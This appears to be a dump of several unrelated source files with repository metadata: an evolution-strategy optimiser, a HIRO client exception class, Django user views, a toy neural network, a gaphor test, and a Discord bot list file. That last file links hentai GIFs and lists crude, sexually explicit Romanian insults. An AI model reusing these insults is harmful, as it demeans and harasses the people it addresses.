self.temporalPool = []
temporal_functional = []
temporal_variance = []
for i in range(self.pool[0].motorNumber):
# Functional mutation
temporal_functional.append(
self.pool[0].functional[i]
+ np.random.normal(scale=self.pool[0].variance[i])
)
temp_indv = Individual(
is10=self.pool[0].is10,
functional=temporal_functional,
variance=self.pool[0].variance,
)
self.temporalPool.append(temp_indv)
def evaluation(self):
"""Selecting the best of the two individual and evaluating them"""
# Getting the fitness evaluations of the former individual and the mutated one
formerIndividualCaller = FitnessFunctionCaller(*(i for i in self.pool[0].functional))
temporalIndividualCaller = FitnessFunctionCaller(
*(i for i in self.temporalPool[0].functional)
)
formerIndividualFitness = formerIndividualCaller.call()
temporalIndividualFitness = temporalIndividualCaller.call()
self.evaluations += 2
# formerBetter is True if the mutation did not improve the fitness over the father
if formerIndividualFitness <= temporalIndividualFitness:
formerBetter = True
else:
formerBetter = False
# bestFitness in between former and temporal
bestFitness = min(formerIndividualFitness, temporalIndividualFitness)
# If the child did improved, we change the pool to the temporal pool
if formerBetter is False:
self.pool = copy.deepcopy(self.temporalPool)
# In any case, we delete the temporal pool at this point
del self.temporalPool
# Variance mutation
for i in range(self.pool[0].motorNumber):
self.pool[0].variance[i] = self.ruleOneFifth(self.pool[0].variance[i])
# Update fitness function
self.pool[0].update_fitness(bestFitness)
# Adding 1 to the success matrix if the best individual is the child
if formerBetter is True:
if len(self.successes) < 10:
self.successes.append(0)
else:
self.successes.pop(0)
self.successes.append(0)
else:
if len(self.successes) < 10:
self.successes.append(1)
else:
self.successes.pop(0)
self.successes.append(1)
# Updating last fitness
self.lastFitness = bestFitness
# Update psi
self.psi = (
self.successes.count(1) / 10
) # ratio of improvement in the last 10 generations
def trainingLoop(self, maxCycles):
"""Training loop, controlled at maximum by the last cicle"""
for cycle in range(maxCycles):
self.mutation()
self.evaluation()
formerResults = []
if len(formerResults) > 10:
formerResults.pop(0)
formerResults.append(
"Generation: "
+ str(cycle)
+ "\tBest fitness: "
+ str(self.pool[0].fitness)
+ "\nBest chromosome: "
+ str(self.pool[0].functional)
)
print(
"Generation: "
+ str(cycle)
+ "\tBest fitness: "
+ str(self.pool[0].fitness)
+ "\nBest chromosome: "
+ str(self.pool[0].functional)
)
stopping = False
for i in range(len(self.pool[0].functional)):
if self.pool[0].variance[i] < 0.0001:
stopping = True
if stopping == True:
print("Early stopping applied")
print(formerResults[0])
break
def ruleOneFifth(self, formerVariance) -> float:
"""Applies the one fifth rule given the former variance"""
# Update psi
self.psi = (
self.successes.count(1) / 10
) # ratio of improvement in the last 10 generations
if self.psi < 0.2:
return self.c * formerVariance
elif self.psi > 0.2:
return self.c / formerVariance
else:
return formerVariance
class EvolutiveStrategyMultiple:
"""Evolution strategy made with a population of individuals."""
def __init__(self, population, family_number, tournament_factor, is10):
self.population = population
self.pool = []
for _ in range(self.population):
indv = Individual(is10)
self.pool.append(indv)
self.family_number = family_number
self.tau = 1 / math.sqrt(2 * math.sqrt(self.pool[0].motorNumber))
self.zero_tau = 1 / math.sqrt(2 * self.pool[0].motorNumber)
self.tournament_factor = tournament_factor
self.evaluations = 0
def element_per_list(self, lista):
"""Auxiliar function; given a list of lists, picks a random for each position searching in all lists"""
temporal_list = []
for position in range(len(lista[0])):
rnd = random.randint(0, (self.family_number - 1))
temporal_list.append(lista[rnd][position])
return temporal_list
def tournament(self):
"""
Selects the best individuals by facing them to each other and keeping the best.
Returns a population of the best inidividuals
"""
len_population = self.family_number * self.population
temp_population = [] # Temporal place for the newly-created population
for _ in range(len_population):
# Get tournament size as the floored integer of the Population Size * Tournament Percentage (aka factor)
tournament_size = math.floor(self.tournament_factor * self.population)
# Selects a random fraction of the total population to participate in the tournament
tournament_selected = random.sample(range(self.population), tournament_size)
# Choose the fittest
fitnesses = []
indexes = []
for index in tournament_selected:
fitnesses.append(self.pool[index].fitness)
indexes.append(index)
fittest_index = indexes[fitnesses.index(min(fitnesses))]
fittest = self.pool[fittest_index]
temp_population.append(fittest)
return temp_population # Returning the new population
def crossover(self, pool):
"""Returns a pool of children, given a the pool of individuals of the last generation and a family number."""
temporal_pool = []
random.shuffle(pool) # randomize the pool of individuals, to randomize crossover
counter = 0 # controls the loops logic
avg_functionals = [0] * pool[0].motorNumber # functional list for the newborns (must be restarted with 0-init)
avg_variances = ([]) # variances list for the newborns (must be restarted by recasting)
for indv in pool:
if counter != (self.family_number - 1): # not the last member of the family
for position in range(indv.motorNumber):
avg_functionals[position] += indv.functional[position] # adds each functional of the current ind to corresponding positions
avg_variances.append(indv.variance) # adds the variance to the list of parent variances
counter += 1
else: # last member of the family -> extra functions
for position in range(indv.motorNumber):
avg_functionals[position] += indv.functional[position]
avg_functionals[
position
] /= (
self.family_number
) # no more sums left, time to divide by family number
avg_variances.append(indv.variance)
# Transforming the list of lists to a list of variances, with a random variance of the parents for each position
avg_variances = self.element_per_list(avg_variances)
# Adding the individual to the temporal pool
temp_indv = Individual(
is10=pool[0].is10,
functional=avg_functionals,
variance=avg_variances,
)
temporal_pool.append(temp_indv)
# Restarting variables, as this family has finished
counter = 0
avg_functionals = [0] * pool[0].motorNumber
avg_variances = []
"""
With this implementation, if population mod family number is not zero, those parents at the end wont create any child.
To cope with that, the parents pool is shuffled. This should not be a problem, just 1 or 2 will be excluded.
At the end, we get the same number of children, so the rest of the operators remain unchanged, and convergence will work just fine.
"""
return temporal_pool
def mutation(self, pool, scaling):
"""
Given a pool of individuals, mutates all individuals
functionals get mutated by a Gaussian distribution
variances get decreased by a Gaussian scheme
"""
for individual in pool:
for i in range(individual.motorNumber):
# Functional mutation
individual.functional[i] += np.random.normal(
loc=0, scale=individual.variance[i]
)
# Variance mutation
if scaling is True:
individual.variance[i] = (
individual.variance[i]
* np.exp(np.random.normal(loc=0, scale=self.tau))
* np.exp(np.random.normal(loc=0, scale=self.zero_tau))
)
else:
individual.variance[i] = individual.variance[i] * np.exp(
np.random.normal(loc=0, scale=self.tau)
)
return pool
def concurrent_evaluation(self, pool):
"""Given a pool of individuals, return a list with its fitness functions"""
callers = [] # list of caller objects of individuals
for individual in pool:
individual_caller = FitnessFunctionCaller(*(i for i in individual.functional))
callers.append(individual_caller)
with futures.ThreadPoolExecutor(max_workers=50) as execute:
future = [execute.submit(callers[i].call) for i in range(len(pool))]
self.evaluations += len(future)
fitnesses = [f.result() for f in future] # list of fitness of the pool
return fitnesses
def selection(self, children_pool):
"""Given a pool of mutated children, and using self.pool (parent's pool), selects the best individuals"""
fitnesses = []
combined_pool = copy.deepcopy(
self.pool
) # introducing parents to a combined pool
combined_pool.extend(children_pool) # introducing childs to a combined pool
for i in range(len(self.pool)):
fitnesses.append(self.pool[i].fitness)
fitnesses.extend(
self.concurrent_evaluation(children_pool)
) # list of fitnesses of the combined pool
for i in range(len(combined_pool)):
combined_pool[i].fitness = fitnesses[i]
combined_pool.sort(key=operator.attrgetter("fitness"))
# ordered_combined_pool = [x for _,x in sorted(zip(fitnesses, combined_pool))] # Population ordered by fitness
self.pool = copy.deepcopy(combined_pool[: self.population]) # The pool will now be the best individuals of both parents and children
fitnesses.sort()
for i in range(len(self.pool)):
self.pool[i].fitness = fitnesses[i]
return
def training_cycle(self, max_cycles, scaling):
"""Training loop, controlled at maximum by the max cycle"""
fitnesses = self.concurrent_evaluation(self.pool)
for i in range(len(self.pool)):
self.pool[i].fitness = fitnesses[i]
for cycle in range(max_cycles):
temp_pool = self.tournament()
temp_pool = self.crossover(temp_pool)
temp_pool = self.mutation(temp_pool, scaling)
self.selection(temp_pool)
print(
"Generation: "
+ str(cycle)
+ "\t Evaluation: "
+ str(self.evaluations)
+ "\tBest fitness: "
+ str(self.pool[0].fitness)
+ "\nBest chromosome: "
+ str(self.pool[0].functional)
+ "\n"
+ str(self.pool[0].variance)
)
if self.pool[0].fitness == 0.0:
print("Early stopping applied")
print(
"Generation: "
+ str(cycle)
+ "\t Evaluation: "
+ str(self.evaluations)
+ "\tBest fitness: "
+ str(self.pool[0].fitness)
+ "\nBest chromosome: "
+ str(self.pool[0].functional)
+ "\n"
+ str(self.pool[0].variance)
)
break
def main():
# Code for strategy of 1 individual
# ee = EvolutiveStrategyOneIndividual(c=ce, is10=True)
# ee.trainingLoop(10000)
# Code for strategy with the best results
ee = EvolutiveStrategyMultiple(
population=300, family_number=2, tournament_factor=0.05, is10=True
)
ee.training_cycle(1000, scaling=True)
if __name__ == "__main__":
main()
| 35.135484 | 144 | 0.580487 |
3a8ac6ed77639549d9368218a7f979d0a6bcc7b7 | 1,638 | py | Python | src/arago/hiro/client/exception.py | 166MMX/hiro-python-library | fb29e3247a8fe1b0f7dc4e68141cf7340a8dd0a5 | [
"MIT"
] | null | null | null | src/arago/hiro/client/exception.py | 166MMX/hiro-python-library | fb29e3247a8fe1b0f7dc4e68141cf7340a8dd0a5 | [
"MIT"
] | null | null | null | src/arago/hiro/client/exception.py | 166MMX/hiro-python-library | fb29e3247a8fe1b0f7dc4e68141cf7340a8dd0a5 | [
"MIT"
] | null | null | null | from typing import Mapping, Any, List
class HiroClientError(Exception):
def __init__(self, *args: object) -> None:
super().__init__(*args)
class OntologyValidatorError(HiroClientError):
message: str
warnings: List[str]
errors: List[str]
def __init__(self, data: Mapping[str, Any]) -> None:
super().__init__()
error = data['error']
self.message = error['message']
result = error['result']
self.warnings = result['warnings']
self.errors = result['errors']
@staticmethod
def is_validator_error(data: Mapping[str, Any]) -> bool:
# {
# 'error': {
# 'message': 'validation failed',
# 'result': {
# 'errors': [
# 'attribute ogit/description is invalid'
# ],
# 'warnings': [
# ]
# }
# }
# }
if 'error' not in data:
return False
error = data['error']
if 'message' not in error or 'result' not in error:
return False
message = error['message']
result = error['result']
if message != 'validation failed' or 'errors' not in result or 'warnings' not in result:
return False
warnings = result['warnings']
errors = result['errors']
if not isinstance(warnings, list) or not isinstance(errors, list):
return False
return True
class HiroServerError(Exception):
def __init__(self, *args: object) -> None:
super().__init__(*args)
| 27.762712 | 96 | 0.525031 |
3a8c95437dc709e3b0251893e5436db0d7890d0f | 8,098 | py | Python | yoongram/users/views.py | happyjy/yoonGram | 20555619721065296d5dab88e80c763b4a3f295e | [
"MIT"
] | null | null | null | yoongram/users/views.py | happyjy/yoonGram | 20555619721065296d5dab88e80c763b4a3f295e | [
"MIT"
] | 9 | 2021-03-09T02:00:36.000Z | 2022-02-26T10:13:36.000Z | yoongram/users/views.py | happyjy/yoonGram | 20555619721065296d5dab88e80c763b4a3f295e | [
"MIT"
] | null | null | null | from rest_framework import status
from rest_framework.response import Response
from rest_framework.views import APIView
from . import models, serializers
from yoongram.notifications import views as notifications_views
class ExploreUsers(APIView):
def get(self, request, format=None):
last_five = models.User.objects.all()[:5]
serializer = serializers.ListUsersSerializer(last_five, many=True, context={"request": request})
return Response(data=serializer.data, status=status.HTTP_200_OK)
class FollowUser(APIView):
def post(self, request, user_id, format=None):
user = request.user
print("################# FollowUser")
try:
user_to_follow = models.User.objects.get(id=user_id)
except models.User.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
# print("################# FollowUser", user_to_follow)
# https://docs.djangoproject.com/en/1.11/ref/models/relations/#django.db.models.fields.related.RelatedManager.add
user.following.add(user_to_follow)
user.save()
# 1-49 Associate user_to_follow with User
notifications_views.create_notification(user, user_to_follow, 'follow')
return Response(status=status.HTTP_200_OK)
class UnFollowUser(APIView):
def post(self, request, user_id, format=None):
user = request.user
print("################# UnFollowUser")
try:
user_to_unfollow = models.User.objects.get(id=user_id)
except models.User.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
print("################# UnFollowUser", user_to_unfollow)
user.following.remove(user_to_unfollow)
user.save()
return Response(status=status.HTTP_200_OK)
class UserProfile(APIView):
def get_user(self, username):
try:
found_user = models.User.objects.get(username=username)
return found_user
except models.User.DoesNotExist:
return None
def get(self, request, username, format=None):
print(username)
found_user = self.get_user(username)
print("### UserProfile get ###")
print(found_user)
if found_user is None:
return Response(status=status.HTTP_404_NOT_FOUND)
serializer = serializers.UserProfileSerializer(found_user)
print(serializer.data)
return Response(data=serializer.data, status=status.HTTP_200_OK)
def put(self, request, username, format=None):
user = request.user
print("### user DATA")
print(request)
print(user) # yjy
print(user.username) # yjy
found_user = self.get_user(username)
if found_user is None:
return Response(status=status.HTTP_404_NOT_FOUND)
elif found_user.username != user.username:
return Response(status=status.HTTP_400_BAD_REQUEST)
else:
serializer = serializers.UserProfileSerializer(
found_user, data=request.data, partial=True)
print("### serializer : ", serializer)
# UserProfileSerializer(<User: yjy>, data={'bio': 'abd'}, partial=True):
# profile_image = ImageField(allow_null=True, max_length=100, required=False)
# username = CharField(help_text='Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=150, validators=[<django.contrib.auth.validators.UnicodeUsernameValidator object>, <UniqueValidator(queryset=User.objects.all())>])
# name = CharField(allow_blank=True, label='Name of User', max_length=255, required=False)
# bio = CharField(allow_null=True, required=False, style={'base_template': 'textarea.html'})
# website = URLField(allow_null=True, max_length=200, required=False)
# post_count = ReadOnlyField()
# followers_count = ReadOnlyField()
# following_count = ReadOnlyField()
# images = CountImageSerializer(many=True):
# id = IntegerField(label='ID', read_only=True)
# file = ImageField(max_length=100)
# comment_count = ReadOnlyField()
# like_count = ReadOnlyField()
print("### found_user : ", found_user) # yjy
print("### request.data : ", request.data) # 변경data eg {"bio": "abc"}
if serializer.is_valid():
serializer.save()
return Response(data=serializer.data, status=status.HTTP_200_OK)
else:
return Response(data=serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class UserFollowerUser(APIView):
def get(self, request, username, format=None):
try:
found_user = models.User.objects.get(username=username)
print(username)
print(found_user)
except models.User.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
user_followers = found_user.followers.all()
serializer = serializers.ListUsersSerializer(user_followers, many=True, context={"request": request})
return Response(data=serializer.data, status=status.HTTP_200_OK)
# class Based Viwes
class UserFollowingUser(APIView):
def get(self, request, username, format=None):
try:
found_user = models.User.objects.get(username=username)
except models.User.DeosNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
user_following = found_user.following.all()
serializer = serializers.ListUsersSerializer(user_following, many=True, context={"request": request})
return Response(data=serializer.data, status=status.HTTP_200_OK)
# function Based Views
# views: path("<slug:username>/following/", view=views.UserFollowingUserFBV, name="user_profile")
# def UserFollowingFBV(request, username):
# if request.method == 'GET':
# try:
# found_user = models.User.objects.get(username=username)
# except models.User.DeosNotExist:
# return Response(status=status.HTTP_404_NOT_FOUND)
# user_following = found_user.following.all()
# serializer = serializers.ListUsersSerializer(user_following, many=True)
# return Response(data=serializer.data, status=status.HTTP_200_OK)
class Search(APIView):
def get(self, request, format=None):
# http://127.0.0.1:8000/users/search/?username=y
username = request.query_params.get('username', None)
print("### SEARCH ###")
print(username)
if username is not None:
users = models.User.objects.filter(username__istartswith=username)
serializer = serializers.ListUsersSerializer(users, many=True, context={"request": request})
return Response(data=serializer.data, status=status.HTTP_200_OK)
else:
return Response(status=status.HTTP_400_BAD_REQUEST)
class ChangePassword(APIView):
def put(self, request, username, format=None):
user = request.user
# step1 로그인한 유저 확인
if user.username == username:
# step2 현재 비밀번호(DB)와 입력한 비밀번호가 같은지 확인
current_password = request.data.get('current_password', None)
# step3 입력한 새 비번을 받아 저장한다.
if current_password is not None:
passwords_match = user.check_password(current_password)
if passwords_match:
new_password = request.data.get('new_password', None)
if new_password is not None:
user.set_password(new_password)
user.save()
return Response(status=status.HTTP_200_OK)
else:
return Response(status=status.HTTP_400_BAD_REQUEST)
else:
return Response(status=status.HTTP_400_BAD_REQUEST)
else:
return Response(status=status.HTTP_400_BAD_REQUEST)
else:
return Response(status=status.HTTP_400_BAD_REQUEST)
| 39.120773 | 261 | 0.645098 |
3a8cac712e69f85d4085b70791e0d285fbcb5630 | 2,507 | py | Python | BabysFirstNeuralNetwork/ToyNN.py | dwpicott/BasicNeuralNetwork | ad4f5878098e5ad167ee2280f5b9b03af02dfa27 | [
"MIT"
] | null | null | null | BabysFirstNeuralNetwork/ToyNN.py | dwpicott/BasicNeuralNetwork | ad4f5878098e5ad167ee2280f5b9b03af02dfa27 | [
"MIT"
] | null | null | null | BabysFirstNeuralNetwork/ToyNN.py | dwpicott/BasicNeuralNetwork | ad4f5878098e5ad167ee2280f5b9b03af02dfa27 | [
"MIT"
] | null | null | null | '''
Basic Python tutorial neural network.
Based on "A Neural Network in 11 Lines of Python" by i am trask
https://iamtrask.github.io/2015/07/12/basic-python-network/
'''
import numpy as np
class ToyNN(object):
'''
Simple two-layer toy neural network
'''
def __init__(self, inputs=3, outputs=1):
#Number of input and output neurons
self.inputs = inputs
self.outputs = outputs
#Initalize synapse weights randomly with a mean of 0
self.synapseWeights = 2 * np.random.random((inputs, outputs)) - 1
# Sigmoid activation function
def Activation(self, x):
return 1 / (1 + np.exp(-x))
# Derivative of the sigmoid activation function
def ActivationPrime(self, x):
return x * (1 - x)
# Forward propogation of inputs to outputs
def FeedForward(self, input):
return self.Activation(np.dot(input, self.synapseWeights));
# Training function
def TrainNN(self, features, targets, iterations=10000):
l0 = features #Input layer
for iter in range(iterations):
#Forward propogation
l1 = self.FeedForward(l0) #output layer
#Error calculation
error = targets - l1
#Back propogation
# multiply slope by the error at each predicted value
delta = error * self.ActivationPrime(l1)
#update weights
self.synapseWeights += np.dot(l0.T, delta)
# Training data: a 1 in the first column directly correlates with a 1 in the output
# training features
features = np.array([ [0, 0, 1],
[0, 1, 1],
[1, 0, 1],
[1, 1, 1] ])
# training targets
targets = np.array([ [0, 0, 1, 1] ]).T # 4x1 matrix
# Seed random number generator
np.random.seed(1)
nn = ToyNN()
print("Training neural network...")
nn.TrainNN(features, targets)
print("Training complete.\n")
print("Input training set:")
print(targets)
print("Expected output:")
print(targets)
print("\nOutput from training set after 10000 iterations:")
print(nn.FeedForward(features))
print("\n==============================\n")
newData = np.array([ [0, 0, 0],
[0, 1, 0],
[1, 0, 0] ])
print("New input data:")
print(newData)
print("Expected output:")
print(np.array([ [0, 0, 1] ]).T)
print("\nOutput for new data not in the training set:")
print(nn.FeedForward(newData)) | 27.25 | 83 | 0.59274 |
3a8dcfa7190ecc79bdaa94535eba0d246aff05b9 | 1,122 | py | Python | gaphor/UML/deployments/tests/test_connector.py | MartinIIOT/gaphor | b08bf6ddb8c92ec87fccabc2ddee697609f73e67 | [
"Apache-2.0"
] | null | null | null | gaphor/UML/deployments/tests/test_connector.py | MartinIIOT/gaphor | b08bf6ddb8c92ec87fccabc2ddee697609f73e67 | [
"Apache-2.0"
] | null | null | null | gaphor/UML/deployments/tests/test_connector.py | MartinIIOT/gaphor | b08bf6ddb8c92ec87fccabc2ddee697609f73e67 | [
"Apache-2.0"
] | null | null | null | import pytest
from gaphor import UML
from gaphor.core.modeling import Diagram
from gaphor.core.modeling.modelinglanguage import (
CoreModelingLanguage,
MockModelingLanguage,
)
from gaphor.SysML.modelinglanguage import SysMLModelingLanguage
from gaphor.UML.deployments.connector import ConnectorItem
from gaphor.UML.modelinglanguage import UMLModelingLanguage
@pytest.fixture
def modeling_language():
return MockModelingLanguage(
CoreModelingLanguage(), UMLModelingLanguage(), SysMLModelingLanguage()
)
def test_create(create):
"""Test creation of connector item."""
conn = create(ConnectorItem, UML.Connector)
assert conn.subject is not None
def test_persistence(create, element_factory, saver, loader):
"""Test connector item saving/loading."""
conn = create(ConnectorItem, UML.Connector)
end = element_factory.create(UML.ConnectorEnd)
conn.end = end
data = saver()
assert end.id in data
loader(data)
diagram = next(element_factory.select(Diagram))
assert diagram.select(ConnectorItem)
assert element_factory.lselect(UML.ConnectorEnd)
| 27.365854 | 78 | 0.762923 |
3a8e21c35da0565b1474e19643e2481a81691a35 | 14,317 | py | Python | utils/lists.py | luciano1337/legion-bot | 022d1ef9eb77a26b57929f800dd55770206f8852 | [
"MIT"
] | null | null | null | utils/lists.py | luciano1337/legion-bot | 022d1ef9eb77a26b57929f800dd55770206f8852 | [
"MIT"
] | null | null | null | utils/lists.py | luciano1337/legion-bot | 022d1ef9eb77a26b57929f800dd55770206f8852 | [
"MIT"
] | null | null | null | pozehug = [
'https://media1.tenor.com/images/4d89d7f963b41a416ec8a55230dab31b/tenor.gif?itemid=5166500',
'https://media1.tenor.com/images/c7efda563983124a76d319813155bd8e/tenor.gif?itemid=15900664',
'https://media1.tenor.com/images/daffa3b7992a08767168614178cce7d6/tenor.gif?itemid=15249774',
'https://media1.tenor.com/images/7e30687977c5db417e8424979c0dfa99/tenor.gif?itemid=10522729',
'https://media1.tenor.com/images/5ccc34d0e6f1dccba5b1c13f8539db77/tenor.gif?itemid=17694740'
]
raspunsuri = [
'Da', 'Nu', 'Ghiceste..', 'Absolut.',
'Desigur.', 'Fara indoiala fratimiu.',
'Cel mai probabil.', 'Daca vreau eu',
'Ajutor acest copil are iq-ul scazut!',
'https://i.imgur.com/9x18D5m.png',
'Sa speram', 'Posibil.',
'Ce vorbesti sampist cordit',
'Se prea poate', 'Atata poti cumetre',
'Daca doresc', 'Teapa cumetre',
'Milsugi grav', 'https://www.youtube.com/watch?v=1MwqNFO_rM4',
'Nu stiu ca nu sunt creativa', 'Nu stiu', 'Asa te-ai nascut bai asta', 'Yamete Kudasaiii.. ^_^', 'E prost dal in morti lui!',
'Nu il poti judeca.'
]
lovitura = [
'https://media1.tenor.com/images/9ea4fb41d066737c0e3f2d626c13f230/tenor.gif?itemid=7355956',
'https://media1.tenor.com/images/612e257ab87f30568a9449998d978a22/tenor.gif?itemid=16057834',
'https://media1.tenor.com/images/528ff731635b64037fab0ba6b76d8830/tenor.gif?itemid=17078255',
'https://media1.tenor.com/images/153b2f1bfd3c595c920ce60f1553c5f7/tenor.gif?itemid=10936993',
'https://media1.tenor.com/images/f9f121a46229ea904209a07cae362b3e/tenor.gif?itemid=7859254',
'https://media1.tenor.com/images/477821d58203a6786abea01d8cf1030e/tenor.gif?itemid=7958720'
]
pisica = [
'https://media1.tenor.com/images/730c85cb58041d4345404a67641fcd46/tenor.gif?itemid=4351869',
'https://media1.tenor.com/images/f78e68053fcaf23a6ba7fbe6b0b6cff2/tenor.gif?itemid=10614631',
'https://media1.tenor.com/images/8ab88b79885ab587f84cbdfbc3b87835/tenor.gif?itemid=15917800',
'https://media1.tenor.com/images/fea93362cd765a15b5b2f45fc6fca068/tenor.gif?itemid=14715148',
'https://media1.tenor.com/images/fb22e08583263754816e910f6a6ae4bd/tenor.gif?itemid=15310654',
'https://media1.tenor.com/images/9596d3118ddd5c600806a44da90c4863/tenor.gif?itemid=16014629',
'https://media1.tenor.com/images/ce038ac1010fa9514bb40d07c2dfed7b/tenor.gif?itemid=14797681',
'https://media1.tenor.com/images/4fbe2ab9d22992d0a42da37804f227e8/tenor.gif?itemid=9606395',
'https://media1.tenor.com/images/f6fe8d1d0463f4e51b6367bbecf56a3e/tenor.gif?itemid=6198981',
'https://media1.tenor.com/images/a862d2cb92bfbe6213e298871b1e8a9a/tenor.gif?itemid=15805236'
]
caini = [
''
]
pozehentai = [
'https://i.alexflipnote.dev/500ce4.gif',
'https://media1.tenor.com/images/832c34c525cc3b7dae850ce5e7ee451c/tenor.gif?itemid=9714277',
'https://media1.tenor.com/images/1169d1ab96669e13062c1b23ce5b9b01/tenor.gif?itemid=9035033',
'https://media1.tenor.com/images/583d46f95740b8dde76b47585d78f3a4/tenor.gif?itemid=19369487',
'https://media1.tenor.com/images/01b39c35fd1ce4bb6ce8be232c26d423/tenor.gif?itemid=12342539',
'https://media1.tenor.com/images/bd39500869eeedd72d94274282fd14f2/tenor.gif?itemid=9252323',
'https://media1.tenor.com/images/65c92e3932d7617146c7faab53e1063b/tenor.gif?itemid=11098571',
'https://media1.tenor.com/images/c344d38d1a2b799db53478b8ec302f9e/tenor.gif?itemid=14057537'
]
pozekiss = [
'https://media1.tenor.com/images/ef4a0bcb6e42189dc12ee55e0d479c54/tenor.gif?itemid=12143127',
'https://media1.tenor.com/images/f102a57842e7325873dd980327d39b39/tenor.gif?itemid=12392648',
'https://media1.tenor.com/images/3d56f6ef81e5c01241ff17c364b72529/tenor.gif?itemid=13843260',
'https://media1.tenor.com/images/503bb007a3c84b569153dcfaaf9df46a/tenor.gif?itemid=17382412',
'https://media1.tenor.com/images/6bd9c3ba3c06556935a452f0a3679ccf/tenor.gif?itemid=13387677',
'https://media1.tenor.com/images/f1dd2c4bade57949f49daeedbe3a4b86/tenor.gif?itemid=17092948'
]
lick = [
'https://media1.tenor.com/images/2ca4ca0d787ca3af4e27cdf71bb9796f/tenor.gif?itemid=15900645'
]
love = [
'https://media1.tenor.com/images/cf20ebeadcadcd54e6778dac16357644/tenor.gif?itemid=10805514'
]
pozegift = [
'https://i.imgur.com/xnHDSIb.jpg',
'https://i.imgur.com/uTrZDlC.jpg',
'https://i.imgur.com/fMgEDlZ.jpg',
'https://i.imgur.com/HZVKaYK.jpg',
'https://i.imgur.com/HvQnLpj.jpg',
'https://i.imgur.com/qRLPalh.jpg',
'https://i.imgur.com/fQaCCNF.jpg',
'https://i.imgur.com/BM8CoqI.jpg',
'https://i.imgur.com/bSTgzZj.jpg',
'https://i.imgur.com/bZOpa6H.jpg',
'https://i.imgur.com/xjHCbLq.jpg',
'https://i.imgur.com/pFn1b1H.jpg',
'https://i.imgur.com/wxA6Yhm.jpg',
'https://i.imgur.com/jw3ohim.jpg',
'https://i.imgur.com/cZOCcvO.jpg',
'https://i.imgur.com/dpDKiNh.jpg',
'https://i.imgur.com/MSmQjc2.jpg',
'https://i.imgur.com/8LXrQmy.jpg',
]
glumemafia = [
'bagameas pulan mata pleci la scoala cu 10lei an buzunar 5lei de drum 5 lei detigari trantimias pulan mata si ai figuri k ai jordani fake din targ si tricou armani luat de la turci k daca iti deschid sifonieru joak turci cu chinezi barbut',
'Cum plm sa iti ia mata telefonu adica dai un capac sa te stie de jupan',
'te lauzi ca stai la oras da tu stai in ultimu sat uitat de lume ciobanoaia cu 3 case si 2 se darama pisamas pe tn',
'Esti mare diva si ai 10k followeri pe insta da cand deschizi picioarele intreaba lumea cine a deschis punga de lotto cu cascaval',
'te dai mare fumator ca fumezi la narghilea si ai vape dar cand ti am zis de davidoff ai zis ca e ala cu ochelari din migos',
'Flexezi un tricou bape luat din obor cu 10 yang da il contactezi pe premieru chinei daca pui urechea la eticheta in rasa mati de saracie',
'cum frt nai auzit de adrian toma cel mai bun giungel wannabe de pa eune frt gen esti nub? :))))',
'gen cum morti mati sa te joci fortnite mai bine iesi afara si ti construiesti o casa ca si asa stai in pubela de gunoi :)))))))))',
'pui story ca mananci la restaurant meniuri scumpe si esti cu gagicatu mancati bn dar tie cand ti-am aratat prima oara pizza ai zis ca au scos astia de la rolex ceasuri cu salam pe el',
'ce corp ai zici ca e blenderu de facea reclama pe taraf la el',
'cand te am dus prima oara la kfc ai comandat parizer mentolat cu sos de lamaie',
'dai share la parazitii spui dalea cu cand soarele rasare am ochii injectati sau muie garda si dai share la poze cu maria si jointuri bai nebunule sa cada mie tot ce am pe casa de nu fumezi in spate la bloc cu batu ca daca afla mata aia descentrata iti fute o palma de singurul lucru pe care o sa il mai bagi in vene e perfuzia fututi morti mati ))))))',
'ho fa terminato cu fitele astea ca atunci cand te-am dus prima data la mc ai intrebat daca se poate manca cu mana',
'fa proasto te dai mare bad bici dar cand ti-am aratat h&m m-ai intrebat pe unde poti taia lemne',
'te crezi mare diva si iti faci poze pe masini si pe garduri da sa moara chilotii lu nelson daca te vede mata ca esti asa rebela iti fute un telefon nokia in cap de nu mai vezi orgoliul vreo 3 ani',
'fa andreio tiam dat felu 2 al meu la grădinița sa mănânci ca tiera foame siacu ai aruncat trandafiri fututen gura de stoarfa',
'Eu, Lorin Fortuna combatant ezoteric complex și corect privind din punct de vedere ezoteric prin rangul ezoteric precum și prin distincţiile ezoterice care mi-au fost conferite de către conducători supremi abilitaţi, blestem ezoteric la nivelul maxim posibil la care dau dreptul rangul și distinctiile ezoterice care mi-au conferite menţionate anterior. Blestem fără sfârşit temporar în mod direct împotriva fiinţei colective superioare de tip civilizaţie virtuală numită: civilizaţia virtuală arahnidica tarantulara, androgina, neagră, emoţional agresională civilizațională condusă la nivel de conducător suprem de către fiinţa superioară androgină alcătuită din: ființa individuală superioară de gen masculin numită Satanos și fiinţa individuală superioară de gen feminin numită Geea, pentru răul existenţial comis împotriva grupării de civilizaţie virtuale de tip gorilian individual neagresională civilizațional și autentic băștinașe în cadrul lumilor planetare ale planetei al cărei lume planetare medie sunt integrate existenţial cu precizarea că, răul existenţial pentru care blestem civilizaţia virtuală pe care am numit-o anterior ultim ca civilizaţie agresională civilizațional a fost comis în perioada temporală specifică calendarului planetar cuprins între data de început în care s-a dat în funcțiune oficial prima bază civilizațională planetară în cadrul zonei existenţiale a planetei a cărei lume planetară medie sunt integrate existențial aferentă și mă refer la zona existențial în cauză și la concret la baza existențială civilizațională virtuală planetară în cauza deci aferentă civilizației virtuale pe care o blestem și până în prezent.',
'fututi morti mati te dai mare smeker faci paneluri de samp da kand tiam zis de error_log ziceai sefu scuzama nam facut eu asa cv fututi morti mati olteanuadv',
'te dai mare futacios si mare fuckboy da singura fata careti zice so futi e reclama depe xnxx cu maria carei in apropierea ta',
'te dai bodybuilder ca tu faci sala sa pui pe tine da sami bag singur pulan cur ca dacati pui mana in sold zici ca esti cupa uefa esti nebun',
'cum sa te desparti de gagicata gen la inima mai ars dar tot nam sa te las',
'te dai mare smecher prin cluburi da cand era pe tv shaolin soudaun iti puneai manusa lu tac tu de sudura pe cap si ziceai ca e pumnu lu tedigong',
'Te dai mare ITst haker pula mea da nai mai trimis ss la nimeni de când ți ai spart ecranu la tlf că ți era rușine să nu se vadă damiaș drumu n pipota matii',
